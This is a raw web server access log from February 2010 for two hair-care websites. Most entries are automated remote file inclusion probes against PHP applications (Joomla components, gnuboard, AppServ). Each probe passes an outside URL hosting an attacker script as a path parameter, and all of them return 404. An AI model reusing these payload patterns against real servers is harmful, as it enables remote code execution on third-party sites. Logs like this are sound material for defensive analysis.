219.240.36.36 - - [08/Feb/2010:04:08:38 -0800] "GET /logs//skin/zero_vote/setup.php?dir=http://www.der-bunker.net/bank/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
219.240.36.36 - - [08/Feb/2010:04:08:38 -0800] "GET /logs/access_091207.log//skin/zero_vote/setup.php?dir=http://www.der-bunker.net/bank/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.103.128.44 - - [08/Feb/2010:04:15:53 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.103.128.44 - - [08/Feb/2010:04:15:53 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.103.128.44 - - [08/Feb/2010:04:15:53 -0800] "GET /logs/access_100118.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.103.128.44 - - [08/Feb/2010:04:15:59 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:18:11 -0800] "GET /dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:18:11 -0800] "GET /logs/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:18:11 -0800] "GET /logs/access.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:19:39 -0800] "GET /dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:19:39 -0800] "GET /logs/access.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:19:40 -0800] "GET /logs/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:19:51 -0800] "GET /logs/access.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:19:51 -0800] "GET /dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [08/Feb/2010:04:19:51 -0800] "GET /logs/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.106 - - [08/Feb/2010:04:20:55 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.195.112.106 - - [08/Feb/2010:04:20:56 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18878 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:23:40 -0800] "GET /logs/access_100118.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:23:40 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:23:40 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:23:52 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.63.198.56 - - [08/Feb/2010:04:25:03 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
67.195.115.235 - - [08/Feb/2010:04:27:11 -0800] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:27:34 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:27:34 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:27:34 -0800] "GET /logs/access_100118.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:27:44 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:28:41 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:28:41 -0800] "GET /logs/access_100118.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:28:41 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.64.197.243 - - [08/Feb/2010:04:29:03 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
91.64.197.243 - - [08/Feb/2010:04:29:03 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
67.195.115.235 - - [08/Feb/2010:04:31:31 -0800] "GET /tmp/?M=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
211.60.28.10 - - [08/Feb/2010:04:43:16 -0800] "GET /logs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "growlonghairfast.com"
211.60.28.10 - - [08/Feb/2010:04:43:16 -0800] "GET /delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:04:45:58 -0800] "GET /bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:04:50:00 -0800] "GET /bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:04:50:38 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:04:50:38 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:04:50:46 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:04:51:47 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:04:51:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:04:51:50 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Feb/2010:04:55:19 -0800] "GET //gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:55:19 -0800] "GET /logs/access.log%20%20///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Feb/2010:04:55:19 -0800] "GET /logs///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.80.193.42 - - [08/Feb/2010:04:58:05 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {308D8A16-4D1B-4388-9B72-79C18FAEB96A}; SV1)" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:04:59:56 -0800] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:04:59:59 -0800] "GET /logs/access_091123.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.166.178 - - [08/Feb/2010:05:00:08 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:05:00:08 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:05:00:09 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.247.222.46 - - [08/Feb/2010:05:01:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
61.247.222.46 - - [08/Feb/2010:05:01:34 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12587 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
67.195.112.187 - - [08/Feb/2010:05:03:33 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.112.187 - - [08/Feb/2010:05:03:33 -0800] "GET /logs/access_090713.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
220.80.108.81 - - [08/Feb/2010:05:03:36 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [08/Feb/2010:05:03:36 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [08/Feb/2010:05:03:36 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.176.230.251 - - [08/Feb/2010:05:04:41 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:06:14 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:05:06:15 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.68.54 - - [08/Feb/2010:05:06:15 -0800] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.60.28.10 - - [08/Feb/2010:05:07:36 -0800] "GET /www.waytochristmission.com/gbbs/bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.freehairsecrets.com"
211.60.28.10 - - [08/Feb/2010:05:07:36 -0800] "GET /logs//www.waytochristmission.com/gbbs/bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.freehairsecrets.com"
220.80.108.81 - - [08/Feb/2010:05:07:38 -0800] "GET /logs///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [08/Feb/2010:05:07:38 -0800] "GET //gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.81 - - [08/Feb/2010:05:07:38 -0800] "GET /logs/access.log%20%20///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:07:49 -0800] "GET /logs/access_091228.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.205.120.218 - - [08/Feb/2010:05:08:05 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [08/Feb/2010:05:08:05 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.205.120.218 - - [08/Feb/2010:05:08:05 -0800] "GET /logs/access.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:09:16 -0800] "GET /logs/access_091228.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.60.28.10 - - [08/Feb/2010:05:09:30 -0800] "GET /logs//www.waytochristmission.com/gbbs/bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "growlonghairfast.com"
211.60.28.10 - - [08/Feb/2010:05:09:30 -0800] "GET /www.waytochristmission.com/gbbs/bbs//delete_all.php?board_skin_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:05:11:34 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:05:12:42 -0800] "GET /logs/access.log//bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:05:12:43 -0800] "GET /bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:05:12:49 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:05:14:18 -0800] "GET /logs//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:05:14:18 -0800] "GET /delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.178 - - [08/Feb/2010:05:14:39 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.36.59.85 - - [08/Feb/2010:05:14:44 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.36.59.85 - - [08/Feb/2010:05:14:44 -0800] "GET /write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.36.59.85 - - [08/Feb/2010:05:14:44 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.73.17.7 - - [08/Feb/2010:05:14:48 -0800] "GET /logs/access_100125.log//bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:05:14:49 -0800] "GET /bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
222.73.17.7 - - [08/Feb/2010:05:14:49 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.115.111.245 - - [08/Feb/2010:05:14:56 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:15:35 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:15:35 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:15:37 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:16:01 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:16:01 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.68.54 - - [08/Feb/2010:05:16:05 -0800] "GET /appserv/main.php?appserv_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.36.59.85 - - [08/Feb/2010:05:16:35 -0800] "GET /write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.36.59.85 - - [08/Feb/2010:05:16:35 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.36.59.85 - - [08/Feb/2010:05:16:35 -0800] "GET /logs/access_091207.log//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.81 - - [08/Feb/2010:05:16:50 -0800] "GET /logs/access.log///gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.106 - - [08/Feb/2010:05:21:20 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17995 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
195.190.166.35 - - [08/Feb/2010:05:23:59 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.190.166.35 - - [08/Feb/2010:05:23:59 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.190.166.35 - - [08/Feb/2010:05:23:59 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
